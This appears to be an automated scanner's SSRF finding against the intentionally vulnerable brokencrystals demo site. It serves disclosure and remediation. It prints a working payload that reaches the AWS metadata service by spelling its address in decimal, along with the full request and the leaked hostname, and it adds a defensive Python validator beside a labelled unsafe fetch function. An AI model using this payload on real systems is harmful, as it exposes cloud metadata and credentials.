
Server Side Request Forgery #13

Description

@bright-security

Server Side Request Forgery

Severity: High Discovered: 10 October 2022, 11:12 PM

CWE ID

CWE-918

CVSS

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Details

A Server Side Request Forgery (SSRF) attack makes the server issue HTTP requests chosen by the attacker, which lets the attacker read or update internal resources that are not reachable from outside.
SSRF occurred while injecting the token "http://2852039166/latest/meta-data/local-hostname" into the path parameter of the URL (the scanner's report leaves the parameter name blank, but the Original and Modified URLs below show that path is the value that was changed). 2852039166 is the decimal encoding of 169.254.169.254, the link-local address of the AWS instance metadata service; the decimal form defeats filters that only look for the dotted-quad string.
Original URL: https://brokencrystals.com/api/file?path=config/products/crystals/amethyst.jpg&type=image/jpg
Modified URL: https://brokencrystals.com/api/file?path=http%3A%2F%2F2852039166%2Flatest%2Fmeta-data%2Flocal-hostname&type=image%2Fjpg
The server fetched the injected URL and relayed the response body as if it were the requested image, so the SSRF retrieved AWS metadata from the internal resource "/latest/meta-data/local-hostname" (the response below carries the instance hostname, ip-10-0-0-200.ec2.internal).

Possible exposure

Execute Unauthorized Code or Commands; Bypass Protection Mechanism; Read Application Data

Remediation suggestions

Allowlist the DNS names or IP addresses the application needs to reach, and validate the user-supplied value against that allowlist only after normalising it: this finding used the decimal form 2852039166 of 169.254.169.254, so the check must decode every IP spelling (decimal, hex, octal, short dotted forms, IPv4-mapped IPv6) before comparing, and for a hostname it must check the address the name actually resolves to, not just the name. Never relay the raw upstream response body to the client; parse the response first and return only the content type the endpoint is meant to serve. Disable every URL scheme the feature does not need (e.g. ftp://, dict://, file://, gopher://). Require authentication on all internal services; on AWS, require IMDSv2 (a session token obtained with a PUT request) so that a plain GET issued through an SSRF cannot read instance metadata.
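Added example (Python; not code from this report or from the brokencrystals project) of a check that implements the remediation above for a user-supplied path value like the one in this finding. It normalises every IPv4 spelling before comparing, so the report's decimal host is recognised as 169.254.169.254 and rejected; it enforces a scheme allowlist and a host allowlist, checks the address an allowlisted name resolves to, and returns that address for the caller to pin. `ALLOWED_HOSTS` and the addresses in it, the `resolver` callback and the `fetch_unsafe` reconstruction are assumptions made for the example.

```python
"""Added example: hardened target check for a server-side URL fetch.

Assumptions (not from the report): outbound fetches are allowed only to a
fixed allowlist of hosts/IPs, and a resolver callback stands in for DNS so
the example runs offline.
"""
import ipaddress
import re
import urllib.request
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}
# Hypothetical allowlist; the addresses are constructed sample values.
ALLOWED_HOSTS = {"cdn.example.com", "93.184.216.35"}
_CGNAT = ipaddress.ip_network("100.64.0.0/10")   # not flagged by ip.is_private
_NUM = re.compile(r"^(0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*)$", re.IGNORECASE)


def fetch_unsafe(path):
    """Reconstruction of what the report implies the endpoint did: if the
    value looks like a URL, fetch it server-side and relay the raw body.
    Shown only as the 'before' of the fix; never call this."""
    if path.startswith(("http://", "https://")):
        return urllib.request.urlopen(path).read()   # any host, any IP spelling
    return None


def parse_ipv4_literal(host):
    """Decode any inet_aton-style IPv4 spelling: decimal (2852039166),
    hex (0xa9fea9fe), octal (0251.0376.0251.0376) and 1- to 4-part forms
    such as 169.254.43518. Returns an IPv4Address, or None if not one."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = []
    for p in parts:
        if not _NUM.match(p):
            return None
        if p[:2].lower() == "0x":
            values.append(int(p[2:], 16))
        elif len(p) > 1 and p[0] == "0":
            values.append(int(p, 8))
        else:
            values.append(int(p))
    *lead, last = values
    # Leading parts are single bytes; the last part fills the remaining bytes.
    if any(v > 255 for v in lead) or last >= 256 ** (4 - len(lead)):
        return None
    n = 0
    for v in lead:
        n = (n << 8) | v
    n = (n << (8 * (4 - len(lead)))) | last
    return ipaddress.IPv4Address(n)


def literal_ip(host):
    """IP address for a literal host in any spelling, unwrapping IPv4-mapped
    IPv6 ([::ffff:169.254.169.254]); None if host is a DNS name."""
    ip = parse_ipv4_literal(host)
    if ip is None:
        try:
            ip = ipaddress.ip_address(host)
        except ValueError:
            return None
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip


def is_public(ip):
    """Reject every range an SSRF against internal infrastructure targets:
    loopback, RFC 1918, link-local (169.254.169.254 lives here), CGNAT,
    multicast, reserved and unspecified."""
    if ip.version == 4 and ip in _CGNAT:
        return False
    return not (ip.is_private or ip.is_loopback or ip.is_link_local
                or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def check_fetch_target(url, allowed_hosts=ALLOWED_HOSTS, resolver=None):
    """Return (ok, reason, pinned_ip). On ok=True the caller must connect to
    pinned_ip (setting the Host header itself) instead of re-resolving, so a
    DNS answer that changes between check and use cannot redirect the
    request. resolver(host) -> str stands in for socket.gethostbyname."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % parts.scheme, None
    if parts.username is not None or parts.password is not None:
        return False, "userinfo in URL", None      # http://cdn.example.com@evil/
    host = parts.hostname
    if not host:
        return False, "no host", None
    ip = literal_ip(host)
    if ip is None:                                 # DNS name: allowlist, then resolve
        if host not in allowed_hosts:
            return False, "host %r not on allowlist" % host, None
        if resolver is None:
            return False, "cannot resolve %r" % host, None
        ip = ipaddress.ip_address(resolver(host))
    elif str(ip) not in allowed_hosts:             # IP literal: compare normalised form
        return False, "%r is %s, not on allowlist" % (host, ip), None
    if not is_public(ip):
        return False, "%s is not a public address" % ip, None
    return True, "ok", str(ip)
```

In production pass `resolver=socket.gethostbyname`; the example leaves it unset so nothing resolves over the network. The returned `pinned_ip` is the address the HTTP client must actually connect to, and any redirect the upstream returns has to go back through `check_fetch_target` before it is followed, otherwise an allowlisted host can bounce the fetch to the metadata address.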

Request

GET https://brokencrystals.com/api/file?path=http%3A%2F%2F2852039166%2Flatest%2Fmeta-data%2Flocal-hostname&type=image%2Fjpg HTTP/1.1
Referer: https://brokencrystals.com/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Cookie: bc-calls-counter=1665443550676; connect.sid=WakDBCc1ZpjPV8GmUMZUSPjeFIchbnbk.yi%2BPDU5Oh9XifqV%2FMuNOyzT9nH8MrfnqvB%2F%2B9BIO4f0
Accept-Encoding: identity
Metadata: true
Metadata-Flavor: Google
Accept: text/html

Response

HTTP/1.1 200
Server: nginx/1.19.8
Date: Mon, 10 Oct 2022 23:12:30 GMT
Content-Type: image/jpg
Connection: keep-alive
vary: Origin
access-control-allow-origin: *
x-xss-protection: 0
strict-transport-security: max-age=0
x-content-type-options: 1
content-security-policy: default-src  * 'unsafe-inline' 'unsafe-eval'
set-cookie: bc-calls-counter=1665443550891
Content-Length: 26
Cache-Control: public, max-age=99999

ip-10-0-0-200.ec2.internal

